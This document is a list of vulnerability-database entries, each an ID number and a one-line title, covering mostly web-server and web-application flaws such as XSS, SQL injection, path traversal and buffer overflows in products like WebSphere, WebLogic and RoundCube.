[62228] WebTrends Crafted Client Domain Name Inverse Lookup Log Corruption XSS
[62226] WebLogExpert Crafted Client Domain Name Inverse Lookup Log Corruption XSS
[62225] WebExpert User-Agent HTTP Header XSS
[62223] IBM WebSphere Commerce Cryptographic Key Weakness Unspecified Issue
[62222] IBM WebSphere Commerce Database Encryption Weakness Local Information Disclosure
[62212] Gefest Web Home Server Unspecified Traversal Arbitrary File Access
[62203] SAP BusinessObjects BusinessProcessBI/axis2-web/HappyAxis.jsp Information Disclosure
[62202] SAP BusinessObjects dswsbobje/axis2-web/HappyAxis.jsp Information Disclosure
[62200] SAP BusinessObjects PerformanceManagement/jsp/viewWebiReportHeader.jsp sEntry Parameter XSS
[62154] IBM WebSphere Service Registry and Repository (WSRR) Property Query Unspecified Remote Data Access
[62140] IBM WebSphere Application Server (WAS) Single Sign-on Requires SSL Function Weakness
[62104] Roundcube Webmail E-mail Message DNS Prefetching Weakness
[62099] WebCalendar Event Deletion CSRF
[62098] WebCalendar week.php URI XSS
[62097] WebCalendar month.php URI XSS
[62096] WebCalendar day.php URI XSS
[62095] WebCalendar users.php tab Parameter XSS
[62076] ViewVC Query Interface query.py Unsupported Root Authorizer Remote Access Restriction Bypass
[62033] Oracle WebLogic Server Node Manager (beasvc.exe) Access Restriction Bypass
[61983] SUSE Linux postfix Network Interface Remote Access Restriction Bypass
[61980] Sun Java System Web Server Authorization: Digest HTTP Header Remote Overflow
[61979] Sun Java System Web Server WebDAV Implementation PROPFIND Request Remote Format String
[61978] Sun Java System Web Server Admin Server HTTP Request Method Token Weakness Remote DoS
[61974] Enano CMS includes/comment.php Comment Submission Interface SQL Injection
[61953] IBM DataPower XS40 / QLOGIC Interface Crafted ICMP Packet Remote DoS
[61937] HP Web Jetadmin SQL Server Connection Multiple Unspecified Issues
[61929] IBM WebSphere Application Server (WAS) TLS Renegotiation Handshakes MiTM Plaintext Data Injection
[61917] XEROX WorkCentre Multiple Products Web Server Unspecified Authentication Bypass
[61890] VP-ASP Shopping Cart Unspecified Script webess Parameter SQL Injection
[61888] Zeus Web Server Unspecified XSS
[61887] Zeus Web Server DNS Request Transaction ID Spoofing Weakness
[61873] Block Class Module for Drupal Configuration Interface Class Field XSS
[61872] Recent Comments Module for Drupal Custom Block Title Interface XSS
[61871] Redatam+SP WebServer cgibin/RpWebEngine.exe BASE Parameter Error Message Path Disclosure
[61870] Redatam+SP WebServer cgibin/RpWebEngine.exe/PortalAction BASE Parameter XSS
[61852] Sun Java System Web Server TRACE Request Handling Overflow
[61851] Sun Java System Web Server webservd OPTIONS Request Handling Overflow
[61843] SAP Web Application Server (WebAS) Integrated ITS Unspecified Remote Overflow
[61807] PhPepperShop Webshop shop/USER_ARTIKEL_HANDLING_AUFRUF.php darstellen Parameter XSS
[61792] WebKit Stylesheet href Property Redirected Target URL Information Disclosure Weakness
[61777] Cherokee Web Server header.c HTTP Request Escape Sequence Terminal Command Injection
[61774] WEBrick HTTP Request Escape Sequence Terminal Command Injection
[61765] Jetty WebApp JSP Snoop Page URI PATH_INFO Parameter XSS
[61722] Oracle BEA WebLogic Server Servlet Container Package Unspecified Remote DoS (2010-0074)
[61721] Oracle BEA WebLogic Server Servlet Container Package Unspecified Remote DoS (2010-0078)
[61720] Oracle BEA WebLogic Server Web Services Unspecified Remote Issue
[61719] Oracle BEA WebLogic Server Web Services Unspecified Remote Information Disclosure
[61718] IBM WebSphere DataPower TLS Renegotiation Handshakes MiTM Plaintext Data Injection
[61711] IBM Lotus Web Content Management Login Page Unspecified XSS
[61699] Zeus Web Server SSLv2 Support Client Hello Message Handling Overflow
[61650] Sun Java System Web Server on Linux Crafted Memory Address Request Remote Code Execution
[61649] Sun Java System Web Server on Linux Crafted Data Remote Memory Location Disclosure
[61630] WebCalenderC3 Unspecified Traversal Arbitrary File Access
[61629] WebCalenderC3 Unspecified XSS
[61624] Cherokee Web Server URI MS-DOS Reserved Word Remote DoS
[61554] WebLeague Admin/index.php Multiple Parameter SQL Injection Authentication Bypass
[61553] WebLeague profile.php name Parameter SQL Injection
[61550] Survey Pro Module for Miniweb index.php URI XSS
[61549] Survey Pro Module for Miniweb index.php campaign_id Parameter SQL Injection
[61539] Cacti Admin Interface Arbitrary Remote Command Execution
[61515] LineWeb Multiple Admin Script Direct Request Arbitrary File Manipulation
[61514] LineWeb index.php op Parameter Traversal Local File Inclusion
[61513] LineWeb admin/index.php op Parameter Traversal Local File Inclusion
[61476] Webace CMS pfNewsDetail.php NewsId Parameter SQL Injection
[61447] CARTwebERP Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access
[61414] eWebquiz quiztakers.asp QuizID Parameter SQL Injection
[61413] eWebquiz importquestions.asp QuizID Parameter SQL Injection
[61412] eWebquiz questions.asp QuizID Parameter SQL Injection
[61388] Esinti Web Design Gold Defter data/defter.mdb Direct Request Database Disclosure
[61362] Vsftpd Webmin Module Unspecified Issues
[61361] Proverbs Web Calendar calendar.php year Parameter XSS
[61360] Proverbs Web Calendar calendar.php month Parameter SQL Injection
[61337] SQL-Ledger Admin Interface Default Configuration Authentication Weakness
[61308] VMware vCenter Lab Manager WebWorks Help Page wwhelp/wwhimpl/common/html/bookmark.htm XSS
[61307] VMware vCenter Lab Manager WebWorks Help Page wwhelp/wwhimpl/common/scripts/switch.js XSS
[61306] VMware vCenter Lab Manager WebWorks Help Page wwhelp/wwhimpl/common/html/frameset.htm XSS
[61305] VMware vCenter Lab Manager WebWorks Help Page wwhelp/wwhimpl/api.htm XSS
[61304] Horde Administration Interface admin/sqlshell.php PATH_INFO Parameter XSS
[61303] Horde Administration Interface admin/cmdshell.php PATH_INFO Parameter XSS
[61301] Kolab Server Web Client Unspecified Image Upload
[61266] webMathematica webMathematica/MSP/ URI XSS
[61239] Social Web CMS User Profile Friends List Manipulation CSRF
[61238] Social Web CMS index.php category Parameter XSS
[61216] OmniWeb mailto: HREF Link Handling Overflow
[61169] web2ldap StartTLS Bind Operation Unspecified Issue
[61168] web2ldap Invalid Command Escaping Unspecified Issue
[61167] web2ldap Unauthenticated Unspecified Arbitrary Site Redirect
[61166] web2ldap Unspecified Error Message XSS
[61165] web2ldap IOError Exception Error Message Path Disclosure
[61164] web2ldap Modify Lists Attribute Display XSS
[61163] web2ldap Referral Handler Error Message XSS
[61162] web2ldap SSL Security Level / Certificate Display Unspecified Weakness
[61161] web2ldap LDAPSession Instance ldapsession.LDAPSession.bind() Function Cache Handling Weakness
[61160] web2ldap Internal URL Redirector Page Redirect Credential Disclosure
[61159] web2ldap Unspecified XSS
[61158] web2ldap ldap-client-cgi FORM Tag METHOD-parameter Unspecified Issue
[61134] IBM Rational ClearQuest CQWeb Unspecified Password Disclosure
[61132] Cisco ASA WebVPN Bookmark URLs ROT13 Encoding Weakness Internal Resource Access
[61131] Oracle WebLogic Admin Console Default Credentials
[61130] Cisco WebEx WRF Player WRF File Handling Unspecified Overflow (CVE-2009-2880)
[61129] Cisco WebEx WRF Player WRF File Handling Unspecified Overflow (CVE-2009-2879)
[61128] Cisco WebEx WRF Player WRF File Handling Unspecified Overflow (CVE-2009-2878)
[61127] Cisco WebEx WRF Player WRF File Handling Unspecified Overflow (CVE-2009-2877)
[61126] Cisco WebEx WRF Player WRF File Handling Unspecified Overflow (CVE-2009-2876)
[61125] Cisco WebEx WRF Player WRF File Handling Unspecified Overflow (CVE-2009-2875)
[61049] VMware vCenter Lab Manager WebWorks Help Page wwhelp_entry.html XSS
[61043] Horde Administration Interface admin/phpshell.php PATH_INFO Parameter XSS
[61029] Omniweb International Domain Name (IDN) Punycode Encoded Domain Name Spoofing
[61020] Webmatic Unspecified SQL Injection
[61019] Webmatic Unspecified XSS
[60945] Circumference WebAuth Secret Token Truncation Weakness
[60932] HP OpenView Network Node Manager (OV NNM) ovwebsnmpsrv.exe CGI sel Parameter Remote Overflow
[60929] HP OpenView Network Node Manager (OV NNM) OvWebHelp.exe CGI Topic Parameter Remote Overflow
[60928] HP OpenView Network Node Manager (OV NNM) webappmon.exe CGI Host Header Handling Remote Overflow
[60899] JBoss Web Console createThresholdMonitor.jsp Multiple Parameter XSS
[60898] JBoss Web Console createSnapshot.jsp Multiple Parameter XSS
[60884] Symantec Multiple Products VRTSweb Component Crafted Request Arbitrary Code Execution
[60883] Webmin / Usermin Unspecified XSS
[60882] Kiwi Syslog Server Cassini Web Server Explorer New Application Registration Information Disclosure
[60881] Kiwi Syslog Server Web Access Login Username Enumeration
[60869] IBM WebSphere Application Server (WAS) Communications Enabled Applications (CEA) Feature Pack Session Identifier Prediction Weakness
[60846] KR-Web adm/krgourl.php DOCUMENT_ROOT Parameter Remote File Inclusion
[60817] Moodle mnet/lib.php MNET Interface Access Restriction Weakness MNET Function Execution
[60806] IBM InfoSphere Information Server Web Console Unspecified XSS
[60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
[60670] HP Operations Manager ovwebusr Default Password
[60634] IBM WebSphere Portal XMLAccess Component Work Directory Unspecified Issue
[60633] IBM WebSphere Portal Collaboration Component People Picker Tag XSS
[60567] RoundCube Webmail Arbitrary Email Send Unspecified CSRF
[60524] Avaya Intuity Audix LX /cswebadm/diag/cgi-bin/nslookup.pl Multiple Parameter Arbitrary Command Execution
[60523] Avaya Intuity Audix LX /cswebadm/diag/cgi-bin/sendrec.pl Multiple Parameter Arbitrary Command Execution
[60471] Web Services Module for Drupal API Access Control Unspecified Weakness
[60444] QT WebKit preflight Request Cross-Origin Resource Sharing Bypass
[60443] QT WebKit FTP Directory Listing Handling Arbitrary Code Execution
[60430] IBM WebSphere Application Server (WAS) XML Password Export Encryption Weakness
[60429] Openwebmail Crafted SCRIPT_FILENAME Environment Variable Local Privilege Escalation
[60411] BEA WebLogic Embedded LDAP Server Anonymous Bind Connection Saturation Remote DoS
[60392] H-Sphere WebShell flist fname Argument Handling Remote Overflow
[60391] H-Sphere WebShell diskusage Path Handling Remote Overflow
[60390] H-Sphere WebShell CGI::readFile URL Content Type Handling Remote Overflow
[60386] BEA WebLogic Server Session Replication Cross-user Session Information Disclosure
[60385] BEA WebLogic Servlet Relative Forwarding Unspecified Remote DoS
[60384] PHP-Nuke Web_Links Module aid Cookie SQL Injection
[60350] IBM Net.Data Web Form Predefined Variable Remote Information Disclosure
[60323] Linux IPTables Netlink Interface Spoofed Message Local DoS
[60315] Alteon OS Browser-Based Interface (BBI) Settings Manipulation CSRF
[60314] Alteon OS Browser-Based Interface (BBI) SSH Log Files XSS
[60293] NETGEAR RP114 Multiple Interface SYN Flood Remote Routing DoS
[60263] Origo ASR-8100 ADSL Router Unpassworded Administrative Interface
[60243] 2Wire Gateway Multiple Products Management Interface xslt page Parameter Remote DoS
[60228] Webmin RPC Module remote_foreign_* Request Remote File Manipulation
[60197] IBM WebSphere Application Server (WAS) Administrative Console Security Component Unspecified CSRF
[60183] Deerfield WebSite Pro Direct Request Arbitrary Source Disclosure
[60180] McAfee VirusScan WebScanX.exe Module DLL Search Path Subversion Local Privilege Escalation
[60156] Abyss Web Server HTTP Location Header CRLF HTTP Response Splitting
[60152] INweb Mail Server HELO Command Remote Overflow DoS
[60149] BEA WebLogic Login Error Message Username Enumeration
[60128] VisNetic WebSite httpd32.exe HTTP OPTIONS Request Remote Overflow DoS
[60120] Webresolve Hostname Handling Remote Overflow
[60118] Webmin Printer Administration Module Printer Name Shell Metacharacter Arbitrary Command Execution
[60100] Software602 Web Server /admin/ Directory Direct Request Privilege Escalation
[60099] BEA WebLogic Server Servlet Mappings Undocumented Extension Policy Enforcement Bypass
[60097] BEA WebLogic Server Cross-user HTTP Request Disclosure
[60096] BEA WebLogic Server Enterprise JavaBeans (EJB) Cross-server Undeploy Weakness
[60019] IBM Lotus Domino Web Server HTTP Error Message Account Enumeration
[60017] AwingSoft Web3D Player WindsPlayerIE.View.1 ActiveX (WindsPly.ocx) SceneURL() Method Overflow
[60015] Sun Java Web Start Unspecified Restricted Resource Access
[60010] HP Praesidium Webproxy Crafted HTTP Request Forwarding Weakness
[59967] Google Chrome WebKit OPTIONS Request Cross-Origin Resource Sharing Security Bypass
[59961] IBM WebSphere Application Server (WAS) Administrative Console Unspecified XSS
[59943] Apple Safari WebKit FTP Directory Listing Handling Arbitrary Code Execution
[59941] Apple Safari WebKit HTML 5 Audio / Video Media Element Loading Weakness
[59940] Apple Safari WebKit Cross-Origin Resource Sharing Bypass
[59934] Simple Web Server (SWS) recv Function Remote Code Execution
[59923] Sun Java SE Java Web Start Implementation Signed JAR File JNLP Application / Applet Interaction Unspecified Issue
[59904] Linksys BEFW11S4 Embedded Web Server HTTP Header Handling Remote Overflow DoS
[59903] D-Link Multiple Router Embedded Web Server HTTP Header Handling Remote Overflow DoS
[59873] XEROX Fiery Webtools summary.php select Parameter SQL Injection
[59865] Microsoft Windows Web Services on Devices API (WSDAPI) Message Header Handling Memory Corruption
[59847] OmniWeb Cross-domain Browser Window Injection Content Spoofing
[59827] Xitami Web Server DOS Filename Request Access Bypass
[59816] Business Objects WebIntelligence Session Token Prediction Weakness
[59815] GameCheats Advanced Web Server advserver.exe Malformed HTTP Requests Remote DoS
[59789] Zeroo Web Server HttpGetRequest Function HTTP Request Remote Overflow
[59786] GoAhead WebServer HTTP GET Request Subdirectory Handling Remote Overflow
[59783] Webmin Default SSL Key Weakness
[59777] Iomega NAS A300U Administration Web Page Cleartext Password Transmission Remote Disclosure
[59775] MyWebServer Long HTTP Request Remote DoS
[59772] Serv-U FTP Server Web Client Session Cookie Handling Remote Overflow
[59748] IBM Lotus Notes Intellisync in BlackBerry Desktop Manager lnresobject.dll ActiveX Crafted Web Page Overflow
[59744] Google Chrome src/webkit/glue/webframeloaderclient_impl.cc WebDataSourceImpl::endOfRedirectChain() Function DoS
[59717] Sun Java JDK / JRE Deployment Toolkit Web Page Handling Unspecified Arbitrary Code Execution
[59716] Sun Java JDK / JRE Web Start Crafted Installer Extension JNLP Handling Trusted Code Execution
[59685] Sun Virtual Desktop Infrastructure (VDI) VirtualBox Web Service Unspecified Remote Authentication Bypass
[59684] HP Power Manager Web Server URL Parameter Handling Remote Overflow
[59661] RoundCube Webmail User Information Modification CSRF
[59599] WebCollection Plus s.dll d Parameter Traversal Arbitrary File Access
[59588] Cherokee Web Server URL Slash Backslash Traversal Arbitrary File Access
[59587] H-Sphere WebShell Multiple Parameter Shell Metacharacter Remote Command Execution
[59575] IceWarp WebMail viewaction.html Arbitrary Directory Creation
[59540] RadioBird WebServer 4 Everyone Long Host Header HTTP GET Request Remote DoS
[59537] Ensim WEBppliance Alias Creation Arbitrary User E-mail Access
[59536] webERP logicworks.ini Direct Request Database Credentials Disclosure
[59528] Simple Web Server (SWS) 404 Error Message File Descriptor Closure Weakness Remote DoS
[59521] WebCalendar *.inc File Direct Request Arbitrary File Access
[59512] WEBsweeper Multiple Method Blacklist Restriction Bypass
[59498] oMail-webmail omail.pl checklogin Function Password Field Arbitrary Command Execution
[59497] Sun Java System Web Server Unspecified Overflow
[59470] Xitami Web Server Connection Saturation Keep-Alive Handling Remote DoS
[59467] ModLogAn processor_web Plugin Traversal Multiple Method Local Arbitrary File Overwrite
[59438] Webshots Desktop Screen Saver Password Authentication Bypass
[59413] 4D Web Server URI Traversal Arbitrary File Access
[59411] PhpWebGallery isadmin.php photo_login Cookie Manipulation Admin Authentication Bypass
[59395] Mozilla Firefox Recursive JavaScript Web-workers Memory Corruption
[59366] Web_Links Module for PHP-Nuke modules.php cid Parameter Error Message Path Disclosure
[59359] Opera Web Font Handling Address Bar Spoofing
[59351] BEA WebLogic PageCompileServlet jsp / jhtml Arbitrary Command Execution
[59350] Samba Web Administration Tool (SWAT) Malformed HTTP Request Saturation Remote DoS
[59343] WebReflex URI Traversal Arbitrary File Access
[59342] pWins Webserver URI Traversal Arbitrary File Access
[59273] WebChat Module for XOOPS index.php roomid Parameter SQL Injection
[59255] WebcamXP Message Field XSS
[59245] BPM Studio Pro Web Server MS-DOS Device Request Remote DoS
[59243] SonicWALL Pro Internal Interface POST Request Remote DoS
[59242] Webwasher CSM Appliance Suite Token Case Mismatch Script Detection Bypass
[59226] SAP Web Application Server (enserver.exe) UDP Packet Handling Unspecified Remote DoS
[59224] phpWebSite News Message IMG Tag XSS
[59209] Citrix XenCenterWeb XenServer Resource Kit config/writeconfig.php pool1 Parameter PHP Code Injection
[59208] Citrix XenCenterWeb XenServer Resource Kit hardstopvm.php stop_vmname Parameter CSRF
[59207] Citrix XenCenterWeb XenServer Resource Kit config/changepw.php username Parameter CSRF
[59206] Citrix XenCenterWeb XenServer Resource Kit login.php username Parameter SQL Injection
[59205] Citrix XenCenterWeb XenServer Resource Kit forcesd.php Multiple Parameter XSS
[59204] Citrix XenCenterWeb XenServer Resource Kit forcerestart.php Multiple Parameter XSS
[59203] Citrix XenCenterWeb XenServer Resource Kit console.php Multiple Parameter XSS
[59202] Citrix XenCenterWeb XenServer Resource Kit config/edituser.php username Parameter XSS
[59189] acWEB Web Server MS-DOS Device Request Remote DoS
[59188] acWEB Web Server URI XSS
[59174] VisNetic WebSite 404 Error Page HTTP_REFERER Header XSS
[59172] KeyFocus (KF) Web Server URI Consecutive Dot Traversal Arbitrary File Access
[59170] Zeroo Web Server URI Traversal Arbitrary File Access
[59144] TwonkyMedia Server Management Interface Credentials Manipulation CSRF
[59136] Oracle BEA WebLogic Server WLS Console Unspecified Remote Issue (2009-3399)
[59135] Oracle BEA WebLogic Server WLS Console Admin Console XSS
[59134] Oracle BEA WebLogic Portal Unspecified Remote Issue
[59089] IBM Rational RequisitePro ReqWeb Help Feature ReqWebHelp/basic/searchView.jsp Multiple Parameter XSS
[59088] IBM Rational RequisitePro ReqWeb Help Feature ReqWebHelp/advanced/workingSet.jsp operation Parameter XSS
[59084] WWWeBBB Forum page.cgi URI Traversal Arbitrary File Access
[59080] WebDrive Security Descriptor binPath Configuration Manipulation Local Privilege Escalation
[59076] Websense Email Security / Personal Email Manager Web Administrator Email Subject XSS
[59075] Websense Email Security / Personal Email Manager web/msgList/viewmsg/viewHeaders.asp Multiple Parameter XSS
[59074] Websense Email Security / Personal Email Manager web/msgList/viewmsg/actions/msgForwardToRiskFilter.asp Multiple Parameter XSS
[59073] Websense Email Security / Personal Email Manager web/msgList/viewmsg/actions/msgAnalyse.asp Multiple Parameter XSS
[59072] Websense Email Security / Personal Email Manager Web Administrator STEMWADM.EXE GET Request Remote DoS
[59040] Direct Web Remoting (DWR) Script Inclusion Error XSS
[59039] Direct Web Remoting (DWR) dwr.util.addOptions Formatting Function XSS
[59034] ActivWebserver URI XSS
[58949] NaviCOPA Web Server Encoded Space Request Script Source Disclosure
[58946] Webform Module for Drupal Cached Page Handling Session Variable Disclosure
[58945] Webform Module for Drupal New Webform Field Label XSS
[58932] BEA WebLogic Crafted Java Client Code DoS
[58904] Dr.Web Anti-virus File Name Handling Overflow
[58835] NEXTWEB (i)Site Unspecified Crafted Request Handling Remote DoS
[58834] NEXTWEB (i)Site databases/Users.mdb Direct Request Credentials Disclosure
[58833] NEXTWEB (i)Site login.asp Multiple Parameter SQL Injection
[58779] Apple Mac OS X WebKit WebCore TD Element ROWSPAN Attribute Handling DoS
[58778] web-app.org WebAPP Crafted File Upload Weakness
[58712] AfterLogic WebMail Pro history-storage.aspx Multiple Parameter XSS
[58648] Palm Pre WebOS Multiple Unspecified Issues
[58641] Sun AnswerBook2 Web Server dwhttpd /tmp/ecm/utf8.so Local Privilege Escalation
[58640] IBM Lotus Domino Web Server DominoNoBanner Function Embedded HTML Information Disclosure
[58639] IBM Lotus Domino Web Server statrep.nsf Unauthorized Arbitrary Document Manipulation
[58638] IBM Lotus Domino Web Server webadmin.ntf Buffer Truncation Function ACL Bypass
[58637] IBM Lotus Domino Web Server Alternate View Document Request ACL Bypass
[58636] IBM Lotus Domino Web Server /$Alarms/ Document Enumeration
[58614] McAfee Email and Web Security Appliance TCP/IP Implementation Queue Connection Saturation TCP State Table Remote DoS
[58603] FreeWebshop index.php action Parameter Traversal Error Message Path Disclosure
[58540] Hart InterCivic JBC / JVO Multiple Physical Interfaces Unauthenticated Vote / Log Manipulation
[58539] Hart InterCivic eScan Ethernet Interface Unauthenticated Privilege Escalation
[58521] WebcamNow Registry Local Cleartext Credential Disclosure
[58421] Cisco ACE XML Gateway / Web Application Firewall Internal IP Address Disclosure
[58419] IBM Tivoli Composite Application Manager for WebSphere Visualization Engine Unspecified XSS
[58417] BIGACE Web CMS Admin Account Creation CSRF
[58408] MaxWebPortal forum.asp Multiple Parameter SQL Injection
[58386] NaviCOPA Web Server ::$DATA Extension Request Source Code Disclosure
[58382] iCRM Basic Component for Joomla! Admin Interface Authentication Bypass
[58380] SAP GUI EAI WebViewer3D ActiveX (WebViewer3D.dll) Multiple Method Arbitrary File Overwrite
[58379] SAP GUI EAI WebViewer2D ActiveX (WebViewer2D.dll) SaveToSessionFile() Method Arbitrary File Overwrite
[58366] Apple Safari WebKit WebKit.dll Crafted String Eval DoS
[58365] IBM WebSphere Application Server (WAS) Unspecified Remote DoS (134567)
[58364] IBM WebSphere Application Server (WAS) FFDC Log File Local Information Disclosure
[58328] nginx WebDAV Multiple Method Traversal Arbitrary File Write
[58324] IBM WebSphere Application Server (WAS) Eclipse Help Unspecified XSS
[58254] IBM WebSphere Business Events Test Servlet wberuntimeear Application Unspecified Arbitrary Code Execution
[58240] Uebimiau Webmail system_admin/admin.ucf Direct Request User Database Disclosure
[58197] RADactive I-Load Webcontrol File Upload Arbitrary Command Execution
[58196] RADactive I-Load WebCoreModule.ashx Traversal Arbitrary File Access
[58195] RADactive I-Load WebcodeModule.ashx Multiple Parameter XSS
[58194] RADactive I-Load WebCoreModule.ashx File Upload Absolute Path Disclosure
[58167] Novell GroupWise WebAccess User.Theme.index Parameter XSS
[58158] HotWeb Rentals details.asp PropId Parameter SQL Injection
[58131] HP StorageWorks Products Remote Management Interface (RMI) RMU_LEVEL Cookie Privilege Escalation
[58106] WebAuth HTTP POST / GET Conversion Password Disclosure
[58088] Bugzilla Bug.create WebService Function Unspecified SQL Injection
[58087] Bugzilla Bug.search WebService Function Unspecified SQL Injection
[58032] Multi Website Default URI search Parameter XSS
[58031] simplePHPWeb admin/files.php Unspecified Admin Authentication Bypass
[58014] SAP NetWeaver ERP Modules Web Service .Net Connector Unspecified Issue
[57912] Java on Apple Mac OS X Java Web Start Command Launcher Unspecified Overflow
[57910] LiteSpeed Web Server Unspecified Post-authentication Issue
[57909] LiteSpeed Web Server lshttpd Unspecified Infinite Loop DoS
[57902] AzeoTech DAQFactory Web Service Unspecified Overflow
[57896] Adobe RoboHelp Management Web Server Crafted POST Request File Upload Arbitrary Code Execution
[57891] Apple iPhone / iPod Touch WebKit Referer Header Information Disclosure
[57884] IBM WebSphere Application Server (WAS) Servlet Engine/Web Container Component HEAD Request Multiple Method Access Restriction Bypass
[57876] McAfee Email and Web Security Appliance Unspecified Arbitrary File Access
[57841] IBM WebSphere MQ Malformed Data Handling Remote DoS
[57840] IBM WebSphere MQ Asynchronous Consume / readahead Functionality Unspecified Memory Overwrite
[57839] IBM WebSphere MQ rriDecompress Unspecified Remote DoS
[57838] Ipswitch WhatsUp Gold NMWebService.exe Unspecified Remote DoS
[57807] IBM Lotus Domino Web Access (DWA) iNotes Unspecified XSS
[57751] QtWeb Refresh / Location Header Multiple Method XSS
[57677] FTPGate Web Proxy Traversal Arbitrary File Access
[57668] Etype Eserv Web Server /? Request Forced Directory Listing
[57662] WeBid eledicss.php file Parameter Arbitrary CSS File Modification
[57631] ShareMailPro POP3 Interface Error Message Account Enumeration
[57619] IBM Lotus Domino webadmin.nsf Directory Creation Command Arbitrary Directory Manipulation
[57580] WeBid item.php id Parameter SQL Injection
[57579] WeBid logs/cron.log Direct Request Information Disclosure
[57578] WeBid Admin Panel username Parameter SQL Injection Authentication Bypass
[57576] WebLibs weblibs.pl TextFile Parameter Shell Metacharacter Arbitrary Command Execution
[57574] BIGACE Web CMS public/index.php id Parameter XSS
[57569] XEROX WorkCentre Web Server Unspecified Unauthorized Access
[57532] BRS WebWeaver HTTP GET Request Remote Overflow
[57530] TelCondex tc.SimpleWebServer Multiple HTTP Header Handling Remote Overflow
[57529] TelCondex tc.SimpleWebServer GET Request Remote Overflow
[57523] Inquira Multiple Unspecified Web-based Issues
[57520] kobo krb5.py Admin Interface Arbitrary User Authentication
[57473] IBM WebSphere Commerce Suite Net.Commerce / Net.Data Components Remote Configuration File Disclosure
[57397] Buildbot status/web/waterfall.py Unspecified Parameter XSS
[57313] BuildBot Web Status Multiple Unspecified XSS
[57214] eZoneScripts Dating Website Unrestricted File Upload Unspecified Arbitrary Code Execution
[57211] Xitami Web Server Administrative Port Remote Overflow DoS
[57150] RoundCube Webmail Vcard Export Unspecified Issue
[57149] RoundCube Webmail Multiple Unspecified Issues
[57148] RoundCube Webmail Unspecified Cross-site AJAX Request Disclosure
[57147] RoundCube Webmail Submitted Host Value Unspecified Issue
[57146] RoundCube Webmail Contact Deletion Unspecified Issue
[57144] RoundCube Webmail Unspecified XSS (1484109)
[57141] RoundCube Webmail Multiple Unspecified SQL Injection
[57140] RoundCube Webmail Multiple Unspecified XSS
[57138] RoundCube Webmail Attachment Upload Handling Unspecified Issue
[57137] RoundCube Webmail Address Book / Identities Unspecified XSS
[57046] IBM WebSphere Application Server (WAS) Service Component Architecture (SCA) Feature Pack authentication.transport Access Restriction Bypass
[57045] IBM WebSphere Application Server (WAS) Security Component Enterprise JavaBeans (EJB) Handling CSIv2 Identity Assertion Restriction Bypass
[57044] IBM WebSphere Application Server (WAS) Web Services Functionality ibm-webservicesclient-bind.xmi Password Weakness Local DoS
[57043] IBM WebSphere Commerce Multiple Unspecified Issues
[57041] IBM WebSphere Application Server (WAS) Servlet Engine/Web Container Component invokefilterscompatibility Property Secure URL Request Authentication Bypass
[57040] IBM WebSphere Application Server (WAS) Migration Component Migration Trace File Information Disclosure
[57038] IBM WebSphere Application Server (WAS) System Management/Repository Component wsadmin JMX MBeans Restriction Bypass
[57037] IBM WebSphere Application Server (WAS) on z/OS System Management/Repository Component File Permission Weakness Remote Information Disclosure
[57036] IBM WebSphere Application Server (WAS) ibm-portlet-ext.xmi portletServingEnabled Parameter Access Restriction Bypass
[57035] IBM WebSphere Partner Gateway (WPG) Unspecified SQL Injection
[57034] IBM WebSphere Commerce Trace Unspecified Local Information Disclosure
[56995] Sun AnswerBook2 Web Server dwhttpd GET Request Remote Format String
[56988] Apple Safari WebKit Crafted Floating-point Numbers Remote Overflow
[56987] Apple Safari WebKit Unspecified Homoglyph URL Domain Name Spoofing
[56986] Apple Safari WebKit EMBED Element pluginspage Attribute Arbitrary file: URL Information Disclosure
[56983] TurnkeyForms Web Hosting Directory Login Functionality password Field SQL Injection
[56978] WebHosting Control Panel login.asp Multiple Parameter SQL Injection Authentication Bypass
[56975] FreeNAS WebGUI Unspecified CSRF
[56972] OpenJDK IcedTea Java Web Start Framework JAR File Trust Weakness Privilege Escalation
[56962] Sun Java SE Web Start Implementation JNLP File Handling DoS
[56939] Hart InterCivic Tally Administrator Interface adjust votes Feature Vote Count Manipulation
[56925] Hart InterCivic JBC Serial Interface (Modem/VRI) Early Voting Mode Unauthenticated Access Code Request Generation
[56923] Hart InterCivic eSlate Serial Interface Unauthenticated Command Execution
[56922] Hart InterCivic JBC ISR Parallel Port Interface Unauthenticated Command Execution
[56916] Microsoft Office Web Components HTMLURL Parameter ActiveX Spreadsheet Object Handling Overflow
[56915] Microsoft Office Web Components OWC10.Spreadsheet ActiveX BorderAround() Method Heap Corruption Arbitrary Code Execution
[56914] Microsoft Office Web Components OWC10 ActiveX Loading/Unloading Memory Allocation Arbitrary Code Execution
[56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
[56809] Webform Module for Drupal Unspecified XSS
[56787] Sun Java JDK / JRE WebStart (javaws.exe) JPEG Decompression Overflow
[56755] Django WSGI-based Web Server Development Service Crafted Request Arbitrary File Access
[56748] Multi Website index.php Browse Parameter SQL Injection
[56733] TT Web Site Manager tt/index.php tt_name Parameter SQL Injection Authentication Bypass
[56635] Miniweb surveypro/index.php campaign_id Parameter SQL Injection
[56634] Miniweb publisher/index.php Multiple Parameter SQL Injection
[56633] Miniweb classifiedads/index.php URI XSS
[56632] Miniweb blogwriter/index.php URI XSS
[56631] Miniweb mediaalbum/index.php URI XSS
[56630] Miniweb jobboard/index.php URI XSS
[56629] Miniweb surveypro/index.php URI XSS
[56628] Miniweb publisher/index.php URI XSS
[56627] Miniweb sitebuilder/index.php URI XSS
[56626] Miniweb onlinestore/index.php URI XSS
[56625] Miniweb myamazon/index.php URI XSS
[56624] Miniweb forum/index.php URI XSS
[56623] Miniweb faqmanager/index.php URI XSS
[56622] Miniweb eventscalendar/index.php URI XSS
[56621] Miniweb directory/index.php URI XSS
[56620] Miniweb index.php Multiple Parameter XSS
[56619] WebStatCaffe visitorduration.php nodayshow Parameter SQL Injection
[56618] WebStatCaffe stat/host.php host Parameter XSS
[56600] Webboard view.php topic Parameter Traversal Arbitrary File Access
[56534] Check Point Web Intelligence Unicode Character Encoding Handling HTTP Traffic Detection Bypass
[56511] WWWBoard Default WebAdmin Account
[56474] Microsoft IIS WebDAV Extension URL Decode Crafted HTTP Request Authentication Bypass
[56458] IBM Lotus Instant Messaging and Web Conferencing Sametime Server Login Error Message User Account Enumeration
[56440] GoAhead WebServer Crafted GET Request Restricted Directory Protection Bypass
[56439] GoAhead WebServer GET Request Encoded Traversal Arbitrary File Access
[56435] WebKit WebCore xml/XMLHttpRequest.cpp Set-Cookie HTTP Response Header Restriction Weakness
[56434] Web On Windows (WOW) ActiveX 2 Multiple Method Arbitrary Command Execution
